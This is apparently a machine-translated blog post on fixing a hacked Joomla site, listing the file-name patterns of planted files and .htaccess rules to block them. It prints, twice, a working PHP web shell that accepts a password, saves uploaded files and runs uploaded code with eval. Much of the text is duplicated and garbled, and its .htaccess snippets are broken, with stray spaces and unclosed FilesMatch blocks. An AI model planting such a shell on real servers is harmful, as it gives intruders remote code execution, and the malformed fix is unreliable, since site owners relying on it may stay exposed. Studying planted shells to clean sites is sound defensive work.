Quick fix hacked site
Good day.
Today I ran into the problem of hacking the Joomla site, I want to share one of the methods that helped solve the problem.
I want to say that the solution is not specific to Joomla and most likely will help in other cases.
If you find that your FTP has a bunch of weird files with names
lib __ *, co __ *, pre __ *, net __ *, func __ *, ad __ *, ext __ *, new __ *, old __ *, fix __ *, fixed __ *, na __ *, av __ *, fx __ *, update __ *, patch__
Where * is one of the file names that are in this directory, and its contents are very similar to this:
Your site was hacked and uploaded to it because called shell.
As long as you figure out what's what, the easiest file to neutralize them is to add the following lines to .htaccess (add):
')
<FilesMatch "^ offlline \ .php $">
Order allow, deny
Deny from all
The files will be neutralized, but I do not recommend to be limited only to this, since This is a consequence of at least 2 problems:
1. You have a hole through which it all crawled.
2. Somewhere there is a file that spreads all this. And if you do not take action, then through it will be able to fill in other modifications.
3. A very big suspicion that this reduces the speed of the web server.
Today I ran into the problem of hacking the Joomla site, I want to share one of the methods that helped solve the problem.
I want to say that the solution is not specific to Joomla and most likely will help in other cases.
If you find that your FTP has a bunch of weird files with names
lib __ *, co __ *, pre __ *, net __ *, func __ *, ad __ *, ext __ *, new __ *, old __ *, fix __ *, fixed __ *, na __ *, av __ *, fx __ *, update __ *, patch__
Where * is one of the file names that are in this directory, and its contents are very similar to this:
<?php
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;
define('PASSWD','8487929db643f81df2d8a2bcfd173348');
function say($t) {
echo "$t\n";
};
function testdata($t) {
say(md5("mark_$t"));
};
echo ""; testdata('start'); if (md5($_POST["p"]) == PASSWD) { if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"), $HTTP_POST_FILES["s"]["size"])) { if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code)) { testdata('save_ok'); }; //eval($code); } else { testdata('save_fail'); }; if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) { eval($code); testdata('ok'); } else { testdata('fail'); }; } else { testdata('pass'); }; testdata('end'); echo " ";
?> <?php
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;
define('PASSWD','8487929db643f81df2d8a2bcfd173348');
function say($t) {
echo "$t\n";
};
function testdata($t) {
say(md5("mark_$t"));
};
echo ""; testdata('start'); if (md5($_POST["p"]) == PASSWD) { if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"), $HTTP_POST_FILES["s"]["size"])) { if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code)) { testdata('save_ok'); }; //eval($code); } else { testdata('save_fail'); }; if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) { eval($code); testdata('ok'); } else { testdata('fail'); }; } else { testdata('pass'); }; testdata('end'); echo " ";
?>Your site was hacked and uploaded to it because called shell.
As long as you figure out what's what, the easiest file to neutralize them is to add the following lines to .htaccess (add):
')
<FilesMatch "^(lib|co|pre|net|func|ad|ext|new|old|fix|fixed|na|av|fx|update|patch)__.*?\.php">
Order allow,deny
Deny from all
<FilesMatch "^ offlline \ .php $">
Order allow, deny
Deny from all
The files will be neutralized, but I do not recommend to be limited only to this, since This is a consequence of at least 2 problems:
1. You have a hole through which it all crawled.
2. Somewhere there is a file that spreads all this. And if you do not take action, then through it will be able to fill in other modifications.
3. A very big suspicion that this reduces the speed of the web server.
Source: https://habr.com/ru/post/66702/
All Articles